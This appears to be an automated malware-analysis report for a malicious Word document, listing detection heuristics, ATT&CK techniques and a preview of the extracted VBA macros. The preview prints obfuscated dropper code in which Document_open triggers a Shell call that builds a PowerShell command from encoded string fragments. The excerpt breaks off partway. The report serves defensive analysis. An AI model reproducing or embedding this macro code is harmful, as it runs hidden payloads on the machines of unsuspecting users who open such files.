MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is configured to execute a shell command, as indicated by the OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. The ClamAV detection name 'Doc.Dropper.Agent-6589611-0' suggests its purpose is to drop and execute a secondary payload. The VBA script itself is heavily obfuscated, but the presence of the Shell() call is a clear indicator of malicious intent.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6618075-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6618075-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11913 bytes |
SHA-256: 806b6ac6a9f6e95cd33bcc11b732cfcce821a6a0f864f212b35d9340434eda1e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HrotVrdd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function qYECDJVzi()
On Error Resume Next
rdSYFj = MUzvuD
ajLInv = Tan(71383)
mUzbOz = CDbl(zZnohW * CDbl(jfGzN + Int(PNrIDU * Rnd(75886)) * YPMOl * Log(82358 * rKLjnq - EfkXKR + Fix(51))))
prwjRT = Tan(48743)
UuQavX = LYfKW
oXuKob = CDbl(aavfT)
OWomd = QvFKc
iYOhU = Tan(44741)
wlVzhG = CDbl(vQRQr * CDbl(nQtkLs + Int(IvdwFi * Rnd(93319)) * HNGODf * Log(46009 * Najawb - zFwCp + Fix(51))))
WKtRBV = Tan(4702)
fKiScj = jsJcGI
WrDKc = CDbl(DKCoEP)
jdQVnD = DHzZGq
DNwBKV = Tan(59719)
OzYoN = CDbl(ihbDTD * CDbl(zFmuu + Int(pbBBHt * Rnd(72338)) * oCijBu * Log(5784 * zdVIEL - CMBkD + Fix(51))))
wUDfGB = Tan(47607)
IJZmud = zoFJiG
zRvbf = CDbl(fwWSJz)
LZjZVV = qjbGp
haBvsi = Tan(72633)
KitMXw = CDbl(IMmtZ * CDbl(zVUXQS + Int(JzzFV * Rnd(15943)) * twVib * Log(31706 * XwIiV - Yqznmz + Fix(51))))
XkVMK = Tan(75980)
aYMovn = SwMSWm
jMinqP = CDbl(UKqERJ)
qYECDJVzi = dwakitU + VBA.Shell(nYikFiCo + Chr(KYOXisO + vbKeyP + jiQXDKVPj) + "owers" + hUMrYzk + DQhSDljvmoR + KhzDtEKMFr + UaQapXtui, 17010 - 17010)
RVsGl = jJjVq
JcIXoo = Tan(40134)
zLJYP = CDbl(nNOSU * CDbl(cNLhh + Int(dUdQHr * Rnd(91225)) * Blmodz * Log(61530 * jzTkH - AHvzAY + Fix(51))))
XswcCr = Tan(41091)
iNOwZ = UWUHqW
hESdaw = CDbl(bZpXn)
WBtBH = pzfVJd
dtnMa = Tan(10585)
Qtikfd = CDbl(BWMwb * CDbl(OUIoN + Int(RdrcU * Rnd(24534)) * rzUrww * Log(24351 * vkOChz - JzozZ + Fix(51))))
SUqqI = Tan(90285)
UTkum = QOTroX
HYQKY = CDbl(lCjfOw)
End Function
Private Sub Document_open()
On Error Resume Next
iXTDd = MAcTaw
oZfiAq = Tan(6159)
jzjwE = CDbl(dznjcn * CDbl(ALXCfX + Int(OqwRqI * Rnd(76237)) * OqXNY * Log(56051 * avhwN - CqqrQ + Fix(51))))
rBdaoC = Tan(7154)
rlbUi = VLzFZ
pDSGvo = CDbl(iwIOP)
hTWdb = YzUuh
PvDlQi = Tan(21419)
AlAPBG = CDbl(shjqz * CDbl(fjtWzj + Int(DuaYO * Rnd(95510)) * ilWrFY * Log(95333 * dvnjK - SmzcZk + Fix(51))))
UfdWNH = Tan(47576)
FCziNW = kIcvoM
LbBEN = CDbl(GLskY)
qYECDJVzi
STlfz = LaFsA
OFsVsR = Tan(47764)
pRiuIr = CDbl(nzjjM * CDbl(PJBSWs + Int(Wljdz * Rnd(66524)) * rZhWC * Log(77241 * HwXwM - GkWjn + Fix(51))))
nhwKI = Tan(67060)
YUIMdU = rBlPA
sTDhE = CDbl(aSSOQM)
vCDPT = mioWG
XurvOZ = Tan(75936)
JASYk = CDbl(oYIrio * CDbl(NZfaXA + Int(ZadSEz * Rnd(20468)) * XJNPJ * Log(58379 * WbSLhl - uDUPh + Fix(51))))
bHIQV = Tan(28961)
jCDHL = GKjZz
jXAUnV = CDbl(AziTf)
End Sub
Attribute VB_Name = "PEqQAwtuhzzaw"
Function hUMrYzk()
On Error Resume Next
uzdHU = Tan(8539)
zWCfCa = Tan(49319)
MwZqzs = XOmED
iKNrkW = CDbl(njhtJr * CDbl(KPdQwE + Int(jKFZR * Rnd(59846)) * qCAOr * Log(19622 * MpnSD - sSYBVD + Fix(51))))
CzHST = CDbl(KwihfS)
wGvivw = OGXQI
VdBJTOLqVYh = "HeLL (" + "'30t92C83F12" + "0%92K1" + "20t2" + "6A7K2" + "6t84C" + "95m77F23C8"
tizpi = Tan(4230)
KiqZs = Tan(88863)
ONjzp = FSiGX
VIvZm = CDbl(bqznN * CDbl(OFhjG + Int(olfuz * Rnd(73556)) * Vwjjca * Log(91450 * ArBjQm - Swnazi + Fix(51))))
YbKJiR = CDbl(vGWMR)
nOMiUz = fvnqW
YlzKHawhzB = "5m88u80A95<" + "89" + "F78G26m72m91" + "%84m9" + "4F85G87C1u" + "30F119C" + "64A74G98A78G26" + "K7t26A84m95u77u" + "23t85%88m80" + "K95u89F78F26A10"
OTSiT = Tan(64524)
NPECjn = Tan(85868)
Qchop = qcuzBn
JrjzCz = CDbl(zSpUn * CDbl(UBFsW + Int(UYYmzq * Rnd(44393)) * zjusq * Log(18850 * EYYEh - dwimvC + Fix(51))))
JkFjHf = CDbl(RQXzid)
wcQqZi = YXpQN
iwCzlFMfKL = "5A67%73G78" + "A95%87K20K116" + "F95G78t" + "20t109m9" + "5m88<" + "121C86m83<" + "95u84G78K1F3" + "0K83C112K94m121"
rsZcwR = Tan(92002)
siNPZ = Tan(16533)
iGAai = zzHTuk
Zmzrl = CDbl(dlChpF * CDbl(ULBnDI + Int(VNVzI * Rnd(84423)) * mBiwoK * Log(68670 * humcZ - WNOdOH + Fix(51))))
QAitz = CDbl(kYlBvw)
vTTpz = tMfGp
jIBszarD = "G89G26m7<26F2" + "9G82%78u7" + "8<74m0<2" + "1<21G83K95m86C" + "95<78m" + "72F8" + "5<84m20G89<"
oGLWM = Tan(33044)
uJETq = Tan(86964)
LiuPDo = kzTOIw
XMlZ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.